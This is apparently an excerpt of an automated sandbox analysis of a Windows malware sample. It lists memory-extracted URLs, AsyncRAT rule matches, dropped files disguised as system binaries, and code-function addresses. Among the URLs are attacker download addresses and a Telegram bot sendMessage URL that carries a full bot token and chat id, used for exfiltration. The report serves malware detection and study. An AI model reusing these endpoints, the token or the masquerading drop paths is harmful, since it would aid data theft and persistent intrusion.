Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifcXlXl
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifdR(
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifqR?
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/googlecode.com/
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/32
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
Source: explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif%hR
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifWR%
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifZR
Source: explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifZh
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifc
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifcx
Source: explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifoh
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/on
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/rerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRI85
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd03.googlecode.com/s
Source: powershell.exe, 0000001A.00000002.2596840069.00000000071AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 0000001F.00000002.2700068287.0000000002D03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000021.00000002.2855023974.00000000087D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microi
Source: svchost.exe, 00000006.00000002.3275754561.0000013EB4E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Windows Logon Application.exe, 00000027.00000002.3006609742.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic1
Source: powershell.exe, 0000001A.00000002.2591269893.00000000058D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2655664001.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2733242381.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: shost.exe, 0000000B.00000002.2585528167.0000000006192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: powershell.exe, 0000001A.00000002.2577315144.00000000049C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.00000000049E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2577315144.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.0000000004891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.2577315144.00000000049C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.00000000049E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000002.2755903963.0000000008353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001A.00000002.2577315144.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.0000000004891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: shost.exe, 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=57023
Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgem
Source: powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2024087486.0000013EB5000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 0000001A.00000002.2591269893.00000000058D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2655664001.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2733242381.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49765 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.shost.exe.477b518.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.475185a.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46aa52a.6.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46fdeda.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46d420a.5.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.InstallUtil.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.477b518.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46fdeda.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46aa52a.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.475185a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.shost.exe.46d420a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

PE file has a writeable .text section

Source: chiara.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: icsys.icn.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: explorer.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: spoolsv.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: svchost.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCC8C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

2_2_00007FF6CCC8C2F0

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

Code function: 11_2_0ACEA878 CreateProcessAsUserW,

11_2_0ACEA878

Source: C:\Users\user\Desktop\chiara.exe	File created: C:\Windows\Resources\Themes\icsys.icn.exe	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	File created: c:\windows\resources\themes\explorer.exe	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	File created: c:\windows\resources\themes\explorer.exe	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	File created: c:\windows\resources\spoolsv.exe	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	File created: c:\windows\resources\spoolsv.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	File created: c:\windows\resources\svchost.exe	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	File created: c:\windows\resources\svchost.exe	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	File created: C:\Windows\Resources\Themes\tjcm.cmn	Jump to behavior

Source: C:\Windows\Resources\Themes\icsys.icn.exe

File deleted: C:\Windows\Resources\Themes\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\chiara.exe	Code function: 0_2_00412C10	0_2_00412C10
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC85E24	2_2_00007FF6CCC85E24
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA1F20	2_2_00007FF6CCCA1F20
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCACE88	2_2_00007FF6CCCACE88
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB0754	2_2_00007FF6CCCB0754
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC8F930	2_2_00007FF6CCC8F930
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC94928	2_2_00007FF6CCC94928
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCAB190	2_2_00007FF6CCCAB190
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA3484	2_2_00007FF6CCCA3484
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9A4AC	2_2_00007FF6CCC9A4AC
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA8DF4	2_2_00007FF6CCCA8DF4
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB0754	2_2_00007FF6CCCB0754
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA2D58	2_2_00007FF6CCCA2D58
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9AF18	2_2_00007FF6CCC9AF18
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCC2080	2_2_00007FF6CCCC2080
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB89A0	2_2_00007FF6CCCB89A0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9C96C	2_2_00007FF6CCC9C96C
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA3964	2_2_00007FF6CCCA3964
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCC5AF8	2_2_00007FF6CCCC5AF8
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCBFA94	2_2_00007FF6CCCBFA94
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA2AB0	2_2_00007FF6CCCA2AB0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC81AA4	2_2_00007FF6CCC81AA4
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC91A48	2_2_00007FF6CCC91A48
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB8C1C	2_2_00007FF6CCCB8C1C
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9BB90	2_2_00007FF6CCC9BB90
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA4B98	2_2_00007FF6CCCA4B98
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC95B60	2_2_00007FF6CCC95B60
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCC2550	2_2_00007FF6CCCC2550
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC876C0	2_2_00007FF6CCC876C0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCBC838	2_2_00007FF6CCCBC838
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC84840	2_2_00007FF6CCC84840
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA21D0	2_2_00007FF6CCCA21D0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9F180	2_2_00007FF6CCC9F180
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC8A310	2_2_00007FF6CCC8A310
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC8C2F0	2_2_00007FF6CCC8C2F0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC87288	2_2_00007FF6CCC87288
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9126C	2_2_00007FF6CCC9126C
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCA53F0	2_2_00007FF6CCCA53F0
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC9B534	2_2_00007FF6CCC9B534
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_01662F90	11_2_01662F90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_01665CA0	11_2_01665CA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_01663E70	11_2_01663E70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_03140448	11_2_03140448
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D11B80	11_2_07D11B80
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3B778	11_2_07D3B778
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3AB68	11_2_07D3AB68
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D39AD0	11_2_07D39AD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D35E78	11_2_07D35E78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3C9C8	11_2_07D3C9C8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D31548	11_2_07D31548
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3D868	11_2_07D3D868
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3C000	11_2_07D3C000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3BFF0	11_2_07D3BFF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3C7F0	11_2_07D3C7F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3E750	11_2_07D3E750
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3AB58	11_2_07D3AB58
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3E740	11_2_07D3E740
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3FB10	11_2_07D3FB10
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3FB01	11_2_07D3FB01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3DF20	11_2_07D3DF20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3B6DD	11_2_07D3B6DD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D39ACF	11_2_07D39ACF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D35E68	11_2_07D35E68
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F230	11_2_07D3F230
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F220	11_2_07D3F220
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3FD88	11_2_07D3FD88
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3C9B8	11_2_07D3C9B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3FD78	11_2_07D3FD78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F530	11_2_07D3F530
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F523	11_2_07D3F523
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F8D8	11_2_07D3F8D8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3F8C8	11_2_07D3F8C8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D30040	11_2_07D30040
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3DC70	11_2_07D3DC70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3146A	11_2_07D3146A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D30007	11_2_07D30007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D3D833	11_2_07D3D833
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE5A68	11_2_0ACE5A68
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE9778	11_2_0ACE9778
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE3370	11_2_0ACE3370
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE0040	11_2_0ACE0040
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE89D0	11_2_0ACE89D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE4DE0	11_2_0ACE4DE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACEADF8	11_2_0ACEADF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACEB100	11_2_0ACEB100
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE5A63	11_2_0ACE5A63
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE77D8	11_2_0ACE77D8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE0BEF	11_2_0ACE0BEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE0BF0	11_2_0ACE0BF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE4388	11_2_0ACE4388
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE4383	11_2_0ACE4383
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACEB798	11_2_0ACEB798
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE3361	11_2_0ACE3361
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACEF728	11_2_0ACEF728
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE003B	11_2_0ACE003B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE4DDB	11_2_0ACE4DDB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_0ACE9138	11_2_0ACE9138
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Code function: 11_2_07D11B55	11_2_07D11B55
Source: C:\Windows\Resources\Themes\explorer.exe	Code function: 17_2_00412C10	17_2_00412C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 21_2_013A21B0	21_2_013A21B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 21_2_013A5180	21_2_013A5180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 21_2_013A1980	21_2_013A1980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_02D9B4A0	26_2_02D9B4A0
